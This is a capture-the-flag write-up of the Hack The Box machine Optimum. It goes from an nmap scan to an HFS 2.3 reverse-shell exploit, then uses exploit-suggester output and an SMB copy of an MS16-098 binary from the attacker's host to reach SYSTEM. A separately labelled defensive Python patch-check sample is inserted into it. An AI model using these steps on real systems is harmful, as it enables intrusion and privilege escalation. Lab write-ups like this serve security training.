OPTIMUM — HTB

Vijay Singh Gurjar
Armour Infosec
Dec 19, 2019

MACHINE IP — 10.10.10.8

Nmap

# nmap -v -A -sVC -oN nmap 10.10.10.8

PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
|_http-favicon: Unknown favicon MD5: 759792EDD4EF8E6BC2D1877D27153CB1
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: HFS 2.3
|_http-title: HFS /
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012|7|Vista|2008

The scan shows that only the HTTP port (80) is open.

HttpFileServer (HFS) 2.3 is running on it.

We enumerated the whole page but didn't find any useful hint, so we moved to Google and searched for vulnerabilities in this server version. I got 39161.py from GitHub; this Python exploit gives a reverse shell, but it needs small changes in the script.

ip_addr = YOUR IP
local_port = YOUR PORT

NOTE: change these two values in the Python script (39161.py) to get a shell.

We got a reverse shell as the kostas user.

After getting the shell, the whoami command confirms that we are the kostas user. Move to C:\Users\kostas\Desktop\user.txt.txt to see the user hash.

Next we look for a way to get Administrator privileges, starting with the systeminfo command.

systeminfo

Host Name: OPTIMUM
OS Name: Microsoft Windows Server 2012 R2 Standard
OS Version: 6.3.9600 N/A Build 9600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00252-70000-00000-AA535
Original Install Date: 18/3/2017, 1:51:36
System Boot Time: 11/12/2019, 5:04:15
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest
Total Physical Memory: 4.095 MB
Available Physical Memory: 3.461 MB
Virtual Memory: Max Size: 5.503 MB
Virtual Memory: Available: 4.901 MB
Virtual Memory: In Use: 602 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: \\OPTIMUM
Hotfix(s): 31 Hotfix(s) Installed.
[01]: KB2959936
[02]: KB2896496
[03]: KB2919355
[04]: KB2920189
[05]: KB2928120
[06]: KB2931358
[07]: KB2931366
[08]: KB2933826
[09]: KB2938772
[10]: KB2949621
[11]: KB2954879
[12]: KB2958262
[13]: KB2958263
[14]: KB2961072
[15]: KB2965500
[16]: KB2966407
[17]: KB2967917
[18]: KB2971203
[19]: KB2971850
[20]: KB2973351
[21]: KB2973448
[22]: KB2975061
[23]: KB2976627
[24]: KB2977629
[25]: KB2981580
[26]: KB2987107
[27]: KB2989647
[28]: KB2998527
[29]: KB3000850
[30]: KB3003057
[31]: KB3014442
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) 82574L Gigabit Network Connection
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.8
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.

Copy this systeminfo output and paste it into a file on your local PC named systeminfo, then run the command below to check which vulnerabilities the machine is missing patches for.

windows-exploit-suggester.py

./windows-exploit-suggester.py -d 2019-09-18-mssb.xls -i /root/vijay/htb/windows/optimum/systeminfo

1. ./windows-exploit-suggester.py --update
   This will give you the latest file of exploits.
2. ./windows-exploit-suggester.py --database 2019-09-18-mssb.xls --systeminfo systeminfo

2019-09-18-mssb.xls - the file you get after the update command
systeminfo - the file into which you copied the Windows output of the systeminfo command

This Python script is used to find vulnerabilities in a Windows machine so that we can exploit them for privilege escalation.
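The same systeminfo file can drive a defender-side patch check. The following is an added example, not part of the original write-up or of windows-exploit-suggester: it parses systeminfo output, collects the installed hotfixes, flags a truncated paste, and reports which baseline items have no matching KB. The sample text, the BASELINE labels and the placeholder KB0000000 are constructed assumptions.

```python
import re

# Constructed excerpt in the same layout as the systeminfo output above.
SAMPLE = """\
Host Name:                 OPTIMUM
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB2959936
                           [02]: KB2896496
                           [03]: KB3014442
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) 82574L Gigabit Network Connection
"""

# Hypothetical baseline: label -> KBs of which at least one must be installed.
# KB0000000 is a placeholder, not a real update id.
BASELINE = {"baseline-item-a": {"KB0000000"},
            "baseline-item-b": {"KB3014442"}}

def parse_systeminfo(text):
    """Extract OS fields, installed KB ids and the hotfix count systeminfo declares."""
    info = {"OS Name": None, "OS Version": None, "declared": None, "hotfixes": set()}
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        item = re.match(r"\[\d+\]:\s*(\S+)", line)
        if item:  # "[NN]: value" lines belong to the most recent section header
            if section == "Hotfix(s)" and re.fullmatch(r"KB\d+", item.group(1)):
                info["hotfixes"].add(item.group(1))
            continue
        key, sep, value = line.partition(":")
        if not sep:
            continue
        section, value = key.strip(), value.strip()
        if section in ("OS Name", "OS Version"):
            info[section] = value
        elif section == "Hotfix(s)":
            count = re.match(r"(\d+)", value)
            info["declared"] = int(count.group(1)) if count else None
    return info

def audit(text, baseline):
    """Return (missing labels, complete); complete is False if hotfix lines were lost."""
    info = parse_systeminfo(text)
    complete = info["declared"] == len(info["hotfixes"])
    missing = sorted(l for l, kbs in baseline.items() if not kbs & info["hotfixes"])
    return missing, complete
```

A missing KB is only a lead: a later cumulative update can supersede it, which this sketch does not model.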

The output showed MS16-098 to be useful. After searching for a while, I found a GitHub repository that has a compiled .exe.

There I got the bfill.exe file. Now the main task is to transfer this file to our target Windows machine.

I used the command below on my local PC to serve the file to the Windows machine:

python smbserver.py abc .

Then, on the Windows machine, we copy the file from the share:

copy \\10.10.14.3\abc\bfill.exe vj.exe

Now we just have to run the exploit, and we get SYSTEM access and root.txt.

THANK YOU……
